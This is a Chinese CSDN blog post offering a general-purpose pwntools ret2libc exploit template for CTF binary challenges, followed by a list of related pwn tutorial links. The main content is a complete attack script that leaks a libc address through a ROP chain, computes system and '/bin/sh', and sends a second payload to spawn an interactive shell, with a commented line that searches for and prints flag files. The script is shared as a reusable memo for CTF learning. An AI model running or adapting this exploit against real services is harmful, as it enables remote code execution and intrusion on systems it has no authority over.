初级 Pwn Ret2Libc 较万用PoC

最新推荐文章于 2024-10-31 17:28:42 发布
最新推荐文章于 2024-10-31 17:28:42 发布
阅读量238 收藏 3
点赞数 1
分类专栏: Pwn 文章标签: 学习 python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127563608
版权 
from pwn import * 
from LibcSearcher import LibcSearcher
#from LibcSearcherX import *
 
elf = ELF("Your Elf")
#libc = ELF("Your Libc") 
io = remote("Ip",Port)
#io = process("Your Elf")
 
# Get Pot and Got 替换为需要获取的函数即可
printf_plt = elf.plt['printf']
read_got = elf.got['read']
main = elf.symbols['main']
 
# Phase 1 --- Leak real address
print("--------------------------------------------------")
print("[+] Leaking real address ...")
print("[+] Phase 1 Inprogress.")
# 替换部分 Payload 以及 recvuntil
payload_addr = flat(b'A' * ( 32 + 0x08 ) + p64(rdi) + p64(format_str) + p64(rsi) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main) )
print("[+] Payload = \n",(payload_addr))
io.recvuntil('name? ')
io.sendline(payload_addr)
#write_addr = u32(io.recv(4))
read_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("[+] Phase 1 Completed.")
print("--------------------------------------------------")
 
# Phase 2 --- Get libcbase address and etc though real address
print("[+] Phase 2 Inprogress.")
print("[+] Trying got system and /bin/sh address though real address")
#libc = LibcSearcher("write",write_addr)

#视情况而选择
 
# Dump
libc = LibcSearcher("read",read_addr)	
libcbase = read_addr - libc.dump('read')
system = libcbase + libc.dump('system')
bin_sh = libcbase + libc.dump('str_bin_sh')
 
# Sym
#libc = LibcSearcherLocal("read",read_addr)
#libcbase = read_addr - libc.sym['read']
#system = libcbase + libc.sym['system']
#bin_sh = libcbase + libc.sym['str_bin_sh']
 
print("[+] Phase 2 Completed")
print("--------------------------------------------------")
 
# Phase 3 --- Print Addresses
print("[+] Phase 3 Inprogress.")
print("[+] Real Address: ",hex(read_addr))
print("[+] Base Address: ",hex(read_addr))
print("[+] System Address: ",hex(system))
print("[+] /bin/sh Address: ",hex(bin_sh))
print("[+] Phase 3 Completed")
print("--------------------------------------------------")
 
# Phase 4 --- Get Shell
# 替换部分 Payload
payload = (b'A' * ( 32 + 0x08 ) + p64(rdi) + p64(bin_sh) + p64(system) )
io.sendline(payload)
#print("Successfully got shell , Automaticly cat flags ...")
#io.sendline("find . -name 'flag.txt' -exec cat {} \;")
io.interactive()

自己写的一个比较通用的PoC,用作备忘。

建议先看看为什么要这么写再使用。

Red-Leaves
关注
专栏目录
pwn ret2libc
清霂的博客
02-04 525
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 338
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 9029
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
ISG pwnme100 poc 学习
Bluish Assassin's Creed
11-21 2137
ISG pwnme100 poc 学习 背景 最近在学习ISG2015比赛的 FlappyPig 的writeup(http://bobao.360.cn/learning/detail/702.html),对其中的pwn比较感兴趣,因此查阅了部分资料后对poc进行了研究。 其中在csdn上海枫的专栏(http://blog.csdn.net/column/details/buffer-ove
Ret2libc错误总结
qq_63528163的博客
08-12 362
平时做题目的错误总结
pwn技巧之ret to libc
这里没人
05-14 2471
简介 在0day攻击当中有许多的技巧,这次介绍一种常用的攻击手段。ret to libc与栈溢出,堆溢出之类的漏洞利用技巧有所不同。ret to libc是一种在漏洞攻击中的常用的思路。目的是最大化利用所发现的漏洞,实现我们最终的目标get shell 首先,我们来认识一个c语言的库函数 int system(const char * string); 这个函数的的功能很简单,执行...
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4383
回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
SCUCTF2020部分writeup
博客
06-21 1160
SCUCTF2020部分writeup MISC 专 业 团 队 binwalk -e Daning.png 提取出word文档 scuctf{19cc63ff-50b9-4254-a997-89d613290918} 记录 flag{b80e3ba4-055f-4c26-9482-23dc46424852} APU的犯罪证据 上传的shell <?php session_start(); function fastpow($a,$b,$c) { if($b==0) ret
PWN基础16:Ret2Libc 32位实例
prettyX的博客
07-21 1149
这节我们研究的源码 //L16.c #include <stdio.h> char buf2[10]="ret2libc is good"; void vul() { char buf[10]; gets(buf); } void main() { write(1,"hello",5); vul(); }
pwnserver:一个支持高度自定义POC的漏洞扫描工具
04-15
PwnServer版本1.0.2 更新: 加快端口扫描 模块化支持 准确的服务信息扫描 指定用于漏洞扫描的服务 CMS版本信息扫描 显示IP地址位置信息 错误修复 自述文件: EnglishРусский 用法: 请检查项目 。
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8378
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
Pocsuite3渗透测试框架编写POC和EXP脚本
悦分享
07-07 5830
一、Pocsuite3简介编写poc和exp并不是大佬们才会的,借助于某些框架,小白也可以编写自己的poc和exp,并且实现批量刷SRC。我们这里使用Pocsuite 3 来实现自己编写脚本,Pocsuite是由”知道创宇404实验室”打造的一款开源的远程漏洞测试框架,你可以直接使用它进行漏洞的验证与利用,也可以基于它进行POC/EXP的开发Pocsuite 3用Pyhton3编写,支持verify、attack及shell三种模式,可以通过指定单个目标或者从文件中导入多个目标,使用单个POC或者POC集合
渗透中POC、EXP、Payload与Shellcode的区别
热门推荐
浅浅的博客
06-17 4万+
1. POC、EXP、Payload与Shellcode POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' ...
地磁传感器(学习笔记下)
Gaorui678的博客
10-26 487
读到后的值,最终传入t_sQMC5883L定义的结构体,注意一下这里面的mag_reg数据变量,定义的时候是16位的3个元素,在读寄存器的时候,强制为8位指针变量,读6个字节。然后我们再写一个计算方位角的函数,使用磁力值计算方位角,最简单的方式,只需要一个公式。咱们接着学习笔记上来学习哈,首先,我们编写读取方位角程序,配置好传感器以后,我们就可以读取磁力值了,我们先定义一个结构体类型,用来存放磁力值以及方位角值。在主函数中,qmc5883l初始化以后,每间隔1秒钟计算1次方位角值,然后通过串口发送到终端。
Flink CDC系列之:学习理解standalone模式
zhengzaifeidelushang的博客
10-28 656
独立模式是 Flink 最简单的部署模式。本简短指南将向您展示如何下载、安装和运行 Flink 的最新稳定版本。您还将运行一个示例 Flink CDC 作业并在 Web UI 中查看它。
人工智能入门要学习多久?
最新发布
cd_farsight的博客
10-31 216
人工智能是一个快速发展的领域,新的技术和算法不断涌现。这可能需要你定期投入时间,比如每月至少花费几个小时来跟踪最新的研究和发展。如果你是计算机科学或相关专业的学生,或者对计算机科学有较深的兴趣,可能能更快地掌握。实践项目的时间可以因项目的复杂性和范围而异,通常需要几个月的时间来完成。学习人工智能所需的时间可以根据个人的学习速度、目标和深度有所不同。这通常需要几个月的时间,具体取决于个人的数学背景。:Python是进行人工智能学习的主要语言,建议从基础开始学习,这也是一个月左右的时间可以掌握。
【我的 PWN 学习手札】setcontext + ROP
Mr_Fmnwon的博客
10-28 802
setcontext的gadget能够“恢复上下文”,即设置寄存器的值。除了可以利用其执行shellcode,还可以实现ROP来getshell。本篇介绍了利用setcontext+ROP的方法,ORW地打印flag信息。
SAP ABAP开发学习——第三代增强(BADI)
m0_64077397的博客
10-31 533
打完断点,新开窗口执行VA01,自动跳进debug界面。通过REPORT工具查询。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值